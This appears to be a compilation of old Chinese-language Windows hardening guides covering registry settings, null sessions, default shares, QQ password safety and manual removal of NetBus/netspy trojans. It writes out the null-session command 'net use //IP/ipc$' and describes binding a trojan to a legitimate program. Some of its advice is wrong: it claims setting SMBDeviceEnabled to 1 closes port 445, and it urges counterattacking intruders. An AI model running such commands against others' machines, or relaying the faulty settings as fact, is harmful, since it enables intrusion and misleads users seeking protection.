  事实上,这就意味着口令破解程序只要破解两个7个字符的口令,并且不用测试小写字符情况即可获得成功。另外,LAN Manager容易被侦听口令散列,侦听可以为攻击者提供用户的口令。Win2000引入了有趣的方法,14个字符的限制被增加到127个,但为了向后兼容仍然使用LAN Manger散列算法,这样,对于与NT相同类型的攻击,密码依旧很脆弱。而且,如果您的整个操作系统环境中有不支持密码长度超过14个字符的非Win2000客户端,您可能会被这种限制搞糊涂。

  有两种方法可以用来防止LM散列的密码被破解。第一种方法是取消LAN Manger在整个网络的鉴定功能,使用NTLMv2。NTLMv2(NT LanManager version 2)的认证方法克服了LAN Manger的大部分脆弱性,使用了更强健的编码,并改进了认证的安全机制。

  从Windows NT 4.0 SP4及以后的系统,包括Windows 2000,微软使得我们在网络上只使用NTLMv2成为可能。在Windows NT和2000中这个功能在注册表中的控制键是HKLM/System/CurrentControlSet/Control/LSA/LMCompatibilityLevel。如果你把它的值设置成3,工作站或服务器将只使用NTLMv2信任证书进行认证。如果设置成5,任何域控制器将拒绝LM和NTLM的认证而只接受NTLMv2。

  如果在你的网络里还有象Windows 95那么“老”的操作系统,必须得小心些,因为那些旧的系统无法在微软网络客户端使用NTLMv2。在Win9x中,该键值是
HKEY_LOCAL_MACHINE/System/CurrentControlSet/Control/LSA/LMCompatibility,它只接受0到3的值(目录服务客户端)。最安全的做法是除去旧的系统,因为它妨碍你为你的组织提供所需的最低安全标准。

  简单的删除网络LanMan散列带来的问题是,在SAM或Active Directory中散列还会产生和存储。微软提供了一次性取消LanMan散列防止再生的方法。在Windows 2000上,找到下面注册键:HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/Lsa,在注册表编辑器RegEdit的菜单中选择Edit,单击Add键,加入一个名为NoLMHash的键值。然后,退出注册表编辑器,重启计算机。下次用户改变口令时,计算机就不会再产生LanMan散列。如果这个键是在Windows 2000域控制器上产生的,LanMan散列就不会被生成并存储在Active Directory。

  在Windows XP中同样的功能可以通过设置键值来完成。在注册表HKEY_LOCAL_MACHINE/System/CurrentControlSet/Control/Lsa下建立一个名为“NoLMHash”的DWORD值,并将其键值改为1即可(图4),这和Windows 2000中生成NoLMHash键的效果是一样。
7、防范共享入侵

  大家知道,如果系统的139端口开放,则计算机就会泄露你的机器的一些信息,其中第一行中的NB便是这台计算机的机器名,WORKGROUP则说明这台机器是工作组模式。最后一行还列出了机器的MAC地址(网卡地址)。

  事实上,对于Windows9x来说,共享入侵的实现离不开139端口的开放,而对于Windows 2000来说,在查看共享资源的时候,系统会先尝试连接139端口。如果139端口关闭的话,就会尝试445端口的连接(在黑客进行IPC$入侵时同样离不开它们),所以防范共享入侵不仅要关闭139端口,还要关闭445端口。把它们都关闭就可以防范别人通过共享来入侵你的电脑,同时也可以防止别人通过IPC$入侵,因为IPC$入侵也离不开139和445端口的支持。

  关闭139端口非常简单,通过防火墙来屏蔽NetBIOS对应的139端口,这样别人就无法攻击我们了。而关闭445端口,则可以通过修改注册表来实现,方法是:在“开始”菜单的“运行”中输入regedit,打开注册表编辑器。然后展开到这里:
HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Services/NetBT/Parameters,在它的下面新建一个DWORD值SMBDeviceEnabled,其键值为1即可,如图所示(如图5)。

 

图 5

  8、禁止空连接

  空连接是在没有信任的情况下与服务器建立的会话,换句话说,它是一个到服务器的匿名访问。使用命令net use //IP/ipc$ "" /user:"" 就可以简单地和目标建立一个空连接(需要目标开放IPC$)。留着不放心,还是禁止掉的好!这一步可以通过批处理来进行,方法是用记事本新建一个文本文件,输入如下内容:

@echo REGEDIT4>>del.reg
@echo.>>del.reg
@echo [HKEY_LOCAL_MACHINE/System/CurrentControlSet/Control/LSA]>>del.reg
@echo "RestrictAnonymous"=dword:00000001>>del.reg
@REGEDIT /S /C del.reg

  另存为以.bat为扩展名的批处理文件,点击这个文件就可以禁止空连接。当然,我们也可以手动来禁止空连接,到注册表HKEY_LOCAL_MACHINE/System/CurrentControlSet/Control/LSA下,将DWORD值RestrictAnonymous的键值改为1即可,效果是一样的。需要指出的是空连接和IPC$是不同的概念。空连接是在没有信任的情况下与服务器建立的会话,换句话说,它是一个到服务器的匿名访问。IPC$是为了让进程间通信而开放的命名管道,可以通过验证用户名和密码获得相应的权限。使用命令net use //IP/ipc$ "" /user:""就可以简单地和目标建立一个空连接(需要目标开放IPC$)。

  9、防范脚本病毒攻击

  脚本病毒是常见的病毒之一,它们的传播速度非常快,主要是通过邮件来传播,由于编写简单,修改容易,所以只要有一个脚本病毒出现,立刻就会出现众多变种,非常令人头疼。其实通过修改注册表也可以简单的防范脚本病毒。下面说说防范方法。

  由于脚本病毒的执行离不开WSH(Windows Script Host),它的代码是通过WSH来解释执行的。所以只要卸载WSH自然可以防范脚本病毒。但是WSH的功能实在是太强大了!所以,如果你不忍心删除它或还需要WSH,可以使用下面这个修改注册表的方法,之后就可以鱼和熊掌兼得了!

  其实,为了避免Windows对脚本不加限制的滥用,微软为Windows脚本宿主5.6采用了一种新的安全模型。使得脚本用户在运行脚本之前验证其真实性。脚本开发人员对其脚本进行签名,以免发生未经授权的修改。管理员可以强制实施严格的策略,确定哪些用户有权在本地或远程运行脚本。在Windows 2000中,签名验证策略是通过“本地安全策略”编辑器设置的。签名验证策略注册表项位于以下配置单元:HKEY_CURRENT_USER/SOFTWARE/Microsoft/Windows ScriptHost/Settings/TrustPolicy,该注册表项设置为以下某个REG_DWORD值:如果为0则运行所有的脚本,如果认为脚本不可信,则提示用户,此时键值可设为1,如果键值为2则只运行可信脚本。建议将该DWORD值设为1。
10、防范其他攻击

  修改注册表还可以防范许多攻击,比方说我们可以:

  (1)关闭Windows默认共享

  用过Windows 2000的朋友一定知道,默认的情况下,硬盘中所有逻辑分区都是被设置成共享的,所以有必要关闭这类不用的共享。首先先把已有的IPC$和默认共享都删除删除(默认共享是为了方便远程管理而开放的共享,包含了所有的逻辑盘c$,d$,e$……和系统目录Winnt或WindowsADMIN$),输入:

  net share ipc$ /del
  net share admin$ /del
  net share c$ /del
  net share c$ /del
  …………

  然后,用记事本编辑如下内容的注册表文件,保存为任意名字的.Reg文件即可:

  Windows Registry Editor Version 5.00

  [HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Services/lanmanserver/parameters]
  "AutoShareServer"=dword:00000000
  "AutoSharewks"=dword:00000000

  注意,在最后面一定要空上一行才行!

  (2)防范WinNuke黑客程序的攻击

  WinNuke是一个破坏力极强的黑客程序,该程序能对计算机中的Windows系统进行破坏,从而会导致整个计算机系统瘫痪,我们可以修改注册表来防范它。展开注册表到HKEY_LOCAL_MACHINE/System/CurrentControlSet/Services/VxD/MSTCP,在对应MSTCP键值的右边窗口中新建一个DWORD值,将它命名为“BSDUrgent”,然后将BSDUrgent的键值设为0,如何重新启动计算机后就可以了。

(2)防止ICMP重定向报文的攻击

  ICMP是Internet Control Message Protocol的缩写,意即网际控制报文协议,ICMP用来发送关于IP数据报传输的控制和错误信息的TCP/IP协议。ICMP攻击主要是指向装有Windwos操作系统的机器发送数量较大且类型随机变化的ICMP包,遭受攻击的计算机会出现系统崩溃的情况,不能正常运作。修改注册表可以防范重定向报文的攻击,方法是打开注册表,展开到:
HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Services/Tcpip/Parameters,将DWORD值EnableICMPRedirects的键值改为0即可(如图6)。该参数控制Windows 2000是否会改变其路由表以响应网络设备发送给它的ICMP重定向消息,Win2000中默认值为1,表示响应ICMP重定向报文。

(3)防止IGMP攻击

  IGMP是Internet Group Management Protocol的缩写,意即Internet群组管理协议,这种TCP/IP协议允许Internet主机参加多点播送——一种向计算机群广播信息的有效手段。IGMP攻击是指向装有Windows操作系统的机器发送长度和数量都较大的IGMP数据包,使得遭受攻击的主机蓝屏下线(Win2000虽然没这个bug了,但IGMP并不是必要的)。我们可以修改注册表,使得系统停止对IGMP协议的响应,以此来防范这种攻击。方法是打开注册表,展开到:HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Services/Tcpip/Parameters,将DWORD值IGMPLevel的键值改为0即可(默认值为2)。

(4)防止SYN洪水攻击

  SYN攻击保护包括减少SYN-ACK重新传输次数,以减少分配资源所保留的时间和路由缓存项资源分配延迟,直到建立连接为止。修改注册表防范SYN洪水攻击的方法是打开注册表,展开到:HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Services/Tcpip/Parameters,将DWORD值SynAttackProtect的键值改为2即可(默认值为0)。如果synattackprotect=2,则AFD的连接指示一直延迟到三路握手完成为止。注意,仅在TcpMaxHalfOpen和TcpMaxHalfOpenRetried设置超出范围时,保护机制才会采取措施。

安全上网心得
上网时间长了,难免碰到一些图谋不轨的家伙对自己发动攻击,开始的时候也没有什么好办法,只能天天祈求上天不要让自己撞到灾星,然而这种“迷信活动”并不能确保上网 的安全性,经过了长时间的积累,我发现知要提高警惕、认识网络黑客的攻击手段,还是可以有效的防治他们的进攻的。经过总结,我将一些比较重要却容易被人们忽视的问题汇编如下,希望给各位网虫一定的帮助:

  一、警惕未知的网页,若可能先获取源代码:

  有的时候通过QQ、电子邮件或者网页广告常会收到一些邀请信件,告诉你有一个非常有意思的地址,这个时候有些人的好奇心就来了,不假思索的通过浏览器去访问那些地址。谁成想打开一看傻了眼,原来那个地址是黑客制作的,其中包含了破坏性代码,想尽快关闭窗口已经来不及了,只听到自己的爱机硬盘一阵狂响——硬盘已经被格式化了……

  这并非危言耸听,利用HTML代码格式化硬盘早在多年前就已经出现了,时至今日仍然有很多人被其所害,主要原因在于系统中没有安装防火墙或者防护软件。这也不能怪大家不够警惕,只能说是“防不胜防”。如何办才好呢?最好的办法就是不去访问这些未知页面,如果你的好奇心非常强烈,那么我建议你先通过特殊的方法获得页面源代码观看。

  获得页面的源代码有很多办法,网上有一些软件——例如GetHttp——可以方便的将远程页面下载回来,使用文本编辑软件对其中的代码进行阅读,如果存在Java代码那么就应该自己分析,看看其中是否有对系统造成威胁的代码了。这种方法似乎比较麻烦,也不是和广大的初学者,但是为了安全,还是应该了解这方面的知识为宜。

  注:上述方法可能比较麻烦,但是在QQ中可能会有一些人突然给你发送过来一个地址,对于这种情况我没有其他什么好办法,只能是先阅读源代码、再进行访问,主要原因是若干年前有过一次惨痛的教训,当时的过程已经模糊了,但是那个事件闹得比较大,后来还上了报纸,受害人数多达万人,而“主谋”不过是一个黑龙江的中学生,我当时也是受害者之一。

  二、更改Format.com和Deltree.exe等危险命令:

  注:上次我错误地将deltree.exe写成了del.exe,实际上DOS系统中并没有del.exe文件,del是一个内部命令,而deltree.exe是DOS系统中存在的一个可以批量删除文件的外部命令,在WinXP等系统中并没有此命令。

  上面所说的格式化等等操作都是一种变相病毒,这种“病毒”没有像CIH那样高深的技术,所使用的不过就是调用Format.com等命令来完成它们的破坏作用的。因而只要你的系统中没有这些命令,那么它们对你就无计可施了。说到这里你一定已经想到了——将可能破坏系统的命令删除掉!

  不要这么绝对嘛,万一你以后要用到这些命令呢?其实完全可以将一些系统中提供的、你却不经常使用的危险命令更个名字,这样相对来说就比较安全了。进入DOS窗口,并使用REN命令对系统中的危险命令更改名称,让它们的扩展名变更成BAK一类,就万事大吉了。

  主要更改的命令有format、fdisk、deltree等,这些命令都能够对硬盘造成直接的威胁,它们主要保存在c:/windows/system32/和c:/windows/目录中,找到并尽快更改名称吧
三、尽量改变软件的默认安装目录:

  为什么要更改软件的默认安装目录呢?这和上面所说得给命令改名一个道理,对于比较低级的破坏性代码,是不具备识别路径功能的,例如最近流行的QQ病毒,就是专门寻找c:/program/tencent/目录是否存在,如果存在就对其进行破坏,如果我们将软件的默认路径更改了,那么这些破坏者就会以为系统中没有他们的目标,而不对我们造成威胁了。

  要更改的软件首当其冲是QQ,如今这个软件越来越火,以它为目标的黑客也越来越多了。一些通过QQ传播的病毒和针对QQ的木马都会被防病毒软件忽略,但是却的确有越来越多的黑客在利用这QQ进行破坏行动。此外例如电子邮件客户端Foxmail等也同样需要更改默认安装目录,虽然我不能说出有什么黑客程序以此为生,但是宁枉勿纵!完全第一!

  这里所说的“病毒”不是真正的病毒程序,而是一种比较简单的攻击代码,攻击者利用经验去进攻存在问题的程序,例如上面提到的c:/program/tencent/qq.exe,攻击者没有必要去编写代码找寻qq.exe的具体路径,因为大多数人都会将qq.exe存放到默认路径中,这就会攻击者带来了边界。

  四、若使用Outlook,应该养成使用Web提前阅读信件的习惯:

  说到了Outlook不得不详细地说一下,这个被强制安装到每一个Windows用户系统中的电子邮件客户端程序,虽然功能强大,但是漏洞也多如黄河之沙,从我还没记事儿起就听说总是有黑客找Outlook当作病毒传播的载体,既然如此你也许以为我又要让你更改它的安装路径,可惜这是一个系统工具,更改路径很麻烦的;而且多数病毒对Outlook的检测并非通过路径完成,因而即便更改了路径也没用。

  当某一天你收到电子邮件,只要使用Outlook浏览,那么可怕的事情就会在瞬间发生!所以最好的办法就是在Outlook没有收到邮件之前先看看邮件的内容,这样心中有数就安全多了。养成一个良好的习惯,使用Web访问电子邮件提供商的网页,例如mail.263.net、freemail.163.com等等,进入之后看看都有什么邮件,一旦发现了可疑的直接通过Web删除,不要让这些邮件进入我们体弱多病的Outlook的身躯才是万全之策。

  要是你认为这样很麻烦,我可以给你推荐一个比较优秀的电子邮件客户程序——Foxmail。当然也可以使用其他邮件程序,总是“择优录取”就是了。什么?你认为一个系统中安装多个邮件客户端很浪费资源?那我也无话可说了,安装和耗费资源——鱼和熊掌,您自己掂量着办吧。

  五、碰到可以窗口尽快将进程强行关闭:

  最后要说的就是浏览器窗口了,如果遇到了一些莫名奇妙的进程,最好的办法就是尽快同时按下Ctrl+Alt+Del将系统进程管理程序调用出来,然后找到令人生疑的进程并将其迅速关闭!

  啊!你不能同时按下三个组合键,好吧,我再教你一招更好的办法——用最快的速度把电脑电源从插座上拔下来!小心不要触电。

防范木马和黑客 保护QQ安全
1.登录QQ前可打开“查找文件或文件夹”对话框,在“本地硬盘驱动器”范围内输入“qq”进行查找,那些没有改名的盗号软件一般能在查找结果中现出原形,如果有,马上将它删除。

  2.用注册向导登录时,可以在号码前加上一长串“0”。这并不影响正常登录,却能迷惑那些木马,因为这类工具多半只能记录9位以下的数字。而面对超出其记录范围的字符,木马要么不予记录,要么记录错误。

  3.输入密码时不按照正常顺序,用光标再定位,“错乱”输入。比如密码是“12as!3”,可先输入“as”,再分别在其前后输入“12”和“!3”,那些记录工具则只会显示“as12!3”。

  4.另外,输入密码时还可以利用粘贴的方式。先在记事本中输入一串含有正确密码的字符,再用鼠标复制正确部分粘贴到密码框中,甚至还可以用汉字作密码粘贴过去。

  5.还有就是一些基本的设置。比如设置“需要身份验证才能加为好友”,“拒绝陌生人消息”,都可以起到预防作用。

   此外,还有几种类型需要说明一下:

  1.QQ密码的丢失,多半是被暗中窃取,因为安装好盗号软件后就可以一劳永逸。然而不能忽视的是暴力破解。虽然这看起来似乎有些笨拙、费力,可对于一个有不良目的又有极大耐心的人,再加上一款厉害的破解软件和一台性能不错的电脑,被盯住的QQ十有八九会被黑掉。

  2.还有些黑客软件可在本地进行密码破解,前提是本地电脑记录中存在以前登录过的QQ文件。假如你的密码不够复杂,很快就会被破解出来的。

  3.也有些黑客软件可以脱机登录本地机上的QQ,能够查看好友列表和聊天记录。比如QQsuperKey,QQ登录密码修改专家,QQ任我行等等,输入软件指定的像“000000”之类的万能密码,就可以毫无顾忌地探测到那些本地机上QQ主人的隐私,也许包括重要的密码信息。这类软件并非提前“埋伏”好的,而是能够随时下载使用,对QQ安全危害极大。

  对于上述这些情况,QQ的安全防范措施是:

  首先,你的QQ密码不能太简单,最好是用字母、数字和符号混合成的,并且不少于8位的复杂密码,这样可以大大增加被破解的难度。

  其次,可以在登录后起用本地消息加密。在“系统参数→安全设置”中设定密码,点击“应用”即可,为QQ再加一道防护。这样对一些查看资料的软件能起到一定的防范作用。

  最后,也是最保险的办法。离线关闭QQ后,彻底删除遗留的文件,包括以自己QQ号命名的文件夹和DAT文件夹中的Oicq2000.cfg文件(最新版本可能会有不同)。这样一来,那些本地机上应用的软件就无能为力了。

  QQ最好还是申请密码保护,这样能够在不幸被黑后及时取回密码

E-mail地址的保密方法
如今的病毒传播速度之所以如此迅速,很大程度上是靠便捷的电子邮件传播。很多人都有类似的经验,信箱经常收到垃圾邮件,不时会发现一些被防毒软件检查到带有病毒的 邮件,更莫名其妙的是,有的邮件竟是自己发送出去的!这究竟是怎么一回事?显然是有人利用你的E-mail地址传播邮件病毒!因为你的E-mail地址已经在不经意间被泄露出去了。未雨绸缪方为上策,上网冲浪时,适当地对E-mail地址进行保护,也是堵住病毒的重要防线。

  加密邮件地址

  在论坛上发表意见时,很多网民朋友都不假思索地直接留下自己的E-mail地址,但问题伴随而来。现在很多的邮件营销工具带有自动收集邮件地址功能,它能像“蜘蛛”一样在网上搜索邮件地址。问题是,我们如何才能在留下E-mail的同时又可避免被自动软件收集到?方法其实很简单,那就是加密您的邮件地址,把它变成只有浏览器看得懂的代码。

  这里要请出的工具是“E_Cloaker”,其中“E-mail Address”是用来输入邮件地址,“Alternate Text”为该地址在网页中对应的显示文本(注意:请设为英文,据笔者试验,设为中文时在IE 6中会显示为乱码),设定完毕后,点击[Make Code]生成加密代码。最后点击[Copy Code]复制加密代码,需要时,把它粘贴到网页中合适的位置即可。

 把邮件地址加密后,您在网页源代码中查看到的E-mail地址将是一堆不可识别的编码,然而它却能在浏览器中正常显示,一点也不妨碍您跟别人的交流。

  下载E_Cloaker:http://www.spychecker.com/program/ecloaker.html

  纯文本显示邮件

  为了收集到更多的邮件地址,垃圾邮件发送者有时会采取“宁可错杀一千,也不放过一个”的原则,它们自动生成邮件地址,然后在发送的邮件中加入一段验证代码,当接收者打开该邮件时,验证程序就会在后台悄悄向“主人”汇报:“该地址有效!”。如何防范这种类型的邮件?

  抓住问题的关键,我们知道这些邮件通常是HTML格式,平时遇到可疑的邮件时,尽量先以纯文本的方式进行查看。Foxmail和OE是国内使用最为广泛的邮件收发软件,下面分别来说明。

  Foxmail:

  在账户的“属性”对话框中,选择左边的“字体与显示”,在右边的显示框中不勾选“使用嵌入式IE浏览HTML邮件”选项。这样在预览HTML邮件时,你需要按下[切换文本和超文本浏览]按钮,才能以HTML方式浏览邮件内容。

  OE:

  OE的最新版本OE 6 SP1已经提供了纯文本显示HTML邮件的功能,不过我们需要手动将其开启:点击主菜单的[工具]→[选项],切换到“阅读”页面,勾选“明文阅读所有信息”选项。对于OE 6 SP1以前的版本,你可以通过安装一个名为“noHTML for Outlook Express”的插件来实现。安装完成后请依照提示重新启动。进入OE后,你会发现工具栏上多了一个“noHtml”的图标按钮,当其处于按下的状态,表明你将以纯文本方式显示HTML邮件。


个人电脑防御黑客绝招
端口

  你在网络上冲浪,别人和你聊天,你发电子邮件,必须要有共同的协议,这个协议就是TCP/IP协议,任何网络软件的通讯都基于TCP/IP协议。如果把互联网比作公路网,电脑就是路边的房屋,房屋要有门你才可以进出,TCP/IP协议规定,电脑可以有256乘以256扇门,即从0到65535号“门”,TCP/IP协议把它叫作“端口”。当你发电子邮件的时候,E-mail软件把信件送到了邮件服务器的25号端口,当你收信的时候,E-mail软件是从邮件服务器的110号端口这扇门进去取信的,你现在看到的我写的东西,是进入服务器的80端口。新安装好的个人电脑打开的端口号是139端口,你上网的时候,就是通过这个端口与外界联系的。黑客不是神仙,他也是---

通过端口进入你的电脑

  黑客是怎么样进入你的电脑的呢?当然也是基于TCP/IP协议通过某个端口进入你的个人电脑的。如果你的电脑设置了共享目录,那么黑客就可以通过139端口进入你的电脑,注意!WINDOWS有个缺陷,就算你的共享目录设置了多少长的密码,几秒钟时间就可以进入你的电脑,所以,你最好不要设置共享目录,不允许别人浏览你的电脑上的资料。除了139端口以外,如果没有别的端口是开放的,黑客就不能入侵你的个人电脑。那么黑客是怎么样才会进到你的电脑中来的呢?答案是通过特洛伊木马进入你的电脑。如果你不小心运行了特洛伊木马,你的电脑的某个端口就会开放,黑客就通过这个端口进入你的电脑。举个例子,有一种典型的木马软件,叫做netspy.exe。如果你不小心运行了netspy.exe,那么它就会告诉WINDOWS,以后每次开电脑的时候都要运行它,然后,netspy.exe又在你的电脑上开了一扇“门”,“门”的编号是7306端口,如果黑客知道你的7306端口是开放的话,就可以用软件偷偷进入到你的电脑中来了。特洛伊木马本身就是为了入侵个人电脑而做的,藏在电脑中和工作的时候是很隐蔽的,它的运行和黑客的入侵,不会在电脑的屏幕上显示出任何痕迹。WINDOWS本身没有监视网络的软件,所以不借助软件,是不知道特洛伊木马的存在和黑客的入侵。接下来,让你利用软件----
如何发现自己电脑中的木马

  再以netspy.exe为例,现在知道netspy.exe打开了电脑的7306端口,要想知道自己的电脑是不是中netspy.exe,只要敲敲7306这扇“门”就可以了。你先打开C:/WINDOWS/WINIPCFG.EXE程序,找到自己的IP地址(比如你的IP地址是10.10.10.10),然后打开浏览器,在浏览器的地址栏中输入 http://10.10.10.10:7306/,如果浏览器告诉你连接不上,说明你的电脑的7306端口没有开放,如果浏览器能连接上,并且在浏览器中跳出一排英文字,说的netspy.exe的版本,那么你的电脑中了netspy.exe木马了。这是最简单最直接的办法,但是需要你知道各种木马所开放的端口,奇奇已知下列端口是木马开放的:7306、7307、7308、12345、12345、12346、31337、6680、8111、9910。但是就算你熟悉了所有已知木马端口,也还是不能完全防范这些木马的,我们需要----

进一步查找木马

  奇奇曾经做了一个试验:我知道netspy.exe开放的是7306端口,于是我用工具把它的端口修改了,经过修改的木马开放的是7777端口了,你现在再用老办法是找不到netspy.exe木马了。于是我们可以用扫描自己的电脑的办法看看电脑有多少端口开放着,并且再分析这些开放的端口。
前面讲了电脑的端口是从0到65535为止,其中139端口是正常的,首先找个端口扫描器,奇奇推荐“代理猎手”,你上网以后,找到自己的IP地址,现在请关闭正在运行的网络软件,因为可能开放的端口会被误认为是木马的端口,然后让代理猎手对0到65535端口扫描,如果除了139端口以外还有其他的端口开放,那么很可能是木马造成的。
排除了139端口以外的端口,你可以进一步分析了,用浏览器, 进入这个端口看看,它会做出什么样的反映,你可以根据情况再判断了。
扫描这么多端口是不是很累,需要半个多小时傻等了,现在好了,我汉化了一个线程监视器,Tcpview.exe可以看电脑有什么端口是开放的,除了139端口以外,还有别的端口开放,你就可以分析了,如果判定自己的电脑中了木马,那么,你就得----

在硬盘上删除木马

  最简单的办法当然是用杀毒软件删除木马了,Netvrv病毒防护墙可以帮你删除netspy.exe和bo.exe木马,但是不能删除netbus木马。

  下面就netbus木马为例讲讲删除的经过。

  简单介绍一下netbus木马,netbus木马的客户端有两种,开放的都是12345端口,一种以Mring.exe为代表(472,576字节),一种以SysEdit.exe为代表(494,592字节)。
Mring.exe一旦被运行以后,Mring.exe就告诉WINDOWS,每次启动就将它运行,WINDOWS将它放在了注册表中,你可以打开C:/WINDOWS/REGEDIT.EXE进入HKEY_LOCAL_MACHINE/Software/Microsoft/Windows/CurrentVersion/Run找到Mring.exe然后删除这个健值,你再到WINDOWS中找到Mring.exe删除。注意了,Mring.exe可能会被黑客改变名字,字节长度也被改变了,但是在注册表中的位置不会改变,你可以到注册表的这个位置去找。

  另外,你可以找包含有“netbus”字符的可执行文件,再看字节的长度,我查过了,WINDOWS和其他的一些应用软件没有包含“netbus”字符的,被你找到的文件多半就是Mring.exe的变种。

  SysEdit.exe被运行以后,并不加到WINDOWS的注册表中,也不会自动挂到其他程序中,于是有人认为这是傻瓜木马,奇奇倒认为这是最最可恶、最最阴险的木马。别的木马被加到了注册表中,你就有痕迹可查了,就连专家们认为最最凶恶的BO木马也可以轻而易举地被我们从注册表中删除。

  而SysEdit.exe要是挂在其他的软件中,只要你不碰这个软件,SysEdit.exe也就不发作,一旦运行了被安装SysEdit.exe的程序,SysEdit.exe也同时启动了。奇奇在自己的电脑中做了这样一个实验,将SysEdit.exe和C:/WINDOWS/SYSTEM/Abcwin.exe捆绑起来,Abcwin.exe是智能ABC输入法,当我开启电脑到上网,只要没有打开智能ABC输入法打字聊天,SysEdit.exe也就没有被运行,你就不能进入我的12345端口,如果我什么时候想打字了,一旦启动智能ABC输入法(Abcwin.exe),那么捆绑在Abcwin.exe上的SysEdit.exe也同时被运行了,我的12345端口被打开,别人就可以黑到我的电脑中来了。同样道理,SysEdit.exe可以被捆绑到网络传呼机、信箱工具等网络工具上,甚至可以捆绑到拨号工具上,电脑中的几百的程序中,你知道会在什么地方发现它吗?所以我说这是最最阴险的木马,让人防不胜防。
有的时候知道自己中了netbus木马,特别是SysEdit.exe,能发现12345端口被开放,并且可以用netbus客户端软件进入自己的电脑,却不知道木马在什么地方。这时候,你可以检视内存,请打开C:/WINDOWS/DRWATSON.EXE,然后对内存拍照,查看“高级视图”中的“任务”标签,“程序”栏中列出的就是正在运行的程序,要是发现可疑的程序,再看“路径”栏,找到这个程序,分析它,你就知道是不是木马了。SysEdit.exe虽然可以隐藏在其他的程序后面,但是在C:/WINDOWS/DRWATSON.EXE中还是暴露了。

  好了,来回顾一下,要知道自己的电脑中有没有木马,只要看看有没有可疑端口被开放,用代理猎手、Tcpview.exe都可以知道。要查找木马,一是可以到注册表的指定位置去找,二是可以查找包含相应的可执行程序,比如,被开放的端口是7306,就找包含“netspy”的可执行程序,三是检视内存,看有没有可以的程序在内存中。
你的电脑上的木马,来源有两种,一种是你自己不小心,运行了包含有木马的程序,另一种情况是,“网友”送给你“好玩”的程序。所以,你以后要小心了,要弄清楚了是什么程序再运行,安装容易排除难呀。

  排除了木马以后,你就可以监视端口,----

悄悄等待黑客的来临

  介绍两个软件,首先是NukeNabber,它是端口监视器,你告诉NukeNabber需要监视7306端口,如果有人接触这个端口,就马上报警。在别人看来,你的电脑的7306端口是开放的,但是7306不是由netspy控制了,当NukeNabber发现有人接触7306端口或者试图进入你的7306端口,马上报警,你可以在NukeNabber上面看到黑客对你做了些什么,黑客的IP地址是哪里,然后,你就可以反过来攻击黑客了。当NukeNabber监视139的时候,你就可以知道谁在用IP炸弹炸你。另外提一下,如果NukeNabber告诉你不能监视7306端口,说这个端口已经被占用了,那么说明你的电脑中存在netspy了。第二个软件就是Tcpview.exe,这个软件是线程监视器,你可以用它来查看有多少端口是开放的,谁在和你通讯,对方的IP地址和端口分别是什么

宽带用户防范黑客攻击十大招式
随着黑客工具的简单化和傻瓜化,众多的技术水平不高的用户也可以利用手中的黑客工具大肆进行攻击(这些人又被称为“灰客”),我们的上网安全受到了极大的威胁,难道我们只能被迫挨打,任其欺负吗?当然不是,只要设置得好,这些人是奈何不了我们的!请看本文讲述的十种方法。

  一、隐藏IP地址

  黑客经常利用一些网络探测技术来查看我们的主机信息,主要目的就是得到网络中主机的IP地址。IP地址在网络安全上是一个很重要的概念,如果攻击者知道了你的IP地址,等于为他的攻击准备好了目标,他可以向这个IP发动各种进攻,如DoS(拒绝服务)攻击、Floop溢出攻击等。隐藏IP地址的主要方法是使用代理服务器。

  与直接连接到Internet相比,使用代理服务器能保护上网用户的IP地址,从而保障上网安全。代理服务器的原理是在客户机(用户上网的计算机)和远程服务器(如用户想访问远端WWW服务器)之间架设一个“中转站”,当客户机向远程服务器提出服务要求后,代理服务器首先截取用户的请求,然后代理服务器将服务请求转交远程服务器,从而实现客户机和远程服务器之间的联系。很显然,使用代理服务器后,其它用户只能探测到代理服务器的IP地址而不是用户的IP地址,这就实现了隐藏用户IP地址的目的,保障了用户上网安全。提供免费代理服务器的网站有很多,你也可以自己用代理猎手等工具来查找。

 

  二、关闭不必要的端口

  黑客在入侵时常常会扫描你的计算机端口,如果安装了端口监视程序(比如Netwatch),该监视程序则会有警告提示。如果遇到这种入侵,可用工具软件关闭用不到的端口,比如,用“Norton Internet Security”关闭用来提供网页服务的80和443端口,其他一些不常用的端口也可关闭。

三、更换管理员帐户

  Administrator帐户拥有最高的系统权限,一旦该帐户被人利用,后果不堪设想。黑客入侵的常用手段之一就是试图获得Administrator帐户的密码,所以我们要重新配置Administrator帐号。

  首先是为Administrator帐户设置一个强大复杂的密码,然后我们重命名Administrator帐户,再创建一个没有管理员权限的Administrator帐户欺骗入侵者。这样一来,入侵者就很难搞清哪个帐户真正拥有管理员权限,也就在一定程度上减少了危险性。

  四、杜绝Guest帐户的入侵

  Guest帐户即所谓的来宾帐户,它可以访问计算机,但受到限制。不幸的是,Guest也为黑客入侵打开了方便之门!网上有很多文章中都介绍过如何利用Guest用户得到管理员权限的方法,所以要杜绝基于Guest帐户的系统入侵。

  禁用或彻底删除Guest帐户是最好的办法,但在某些必须使用到Guest帐户的情况下,就需要通过其它途径来做好防御工作了。首先要给Guest设一个强壮的密码,然后详细设置Guest帐户对物理路径的访问权限。举例来说,如果你要防止Guest用户可以访问tool文件夹,可以右击该文件夹,在弹出菜单中选择“安全”标签,从中可看到可以访问此文件夹的所有用户。删除管理员之外的所有用户即可。或者在权限中为相应的用户设定权限,比方说只能“列出文件夹目录”和“读取”等,这样就安全多了。
五、封死黑客的"后门"

  俗话说“无风不起浪”,既然黑客能进入,那我们的系统一定存在为他们打开的"后门",我们只要将此堵死,让黑客无处下手,岂不美哉!

  1.删掉不必要的协议

 

  对于服务器和主机来说,一般只安装TCP/IP协议就够了。鼠标右击“网络邻居”,选择“属性”,再鼠标右击“本地连接”,选择“属性”,卸载不必要的协议。其中NetBIOS是很多安全缺陷的源泉,对于不需要提供文件和打印共享的主机,可以将绑定在TCP/IP协议的NetBIOS给关闭,避免针对NetBIOS的攻击。

  2.关闭“文件和打印共享”

 

  文件和打印共享应该是一个非常有用的功能,但在我们不需要它的时候,它也是引发黑客入侵的安全漏洞。所以在没有必要"文件和打印共享"的情况下,我们可以将其关闭。即便确实需要共享,也应该为共享资源设置访问密码。

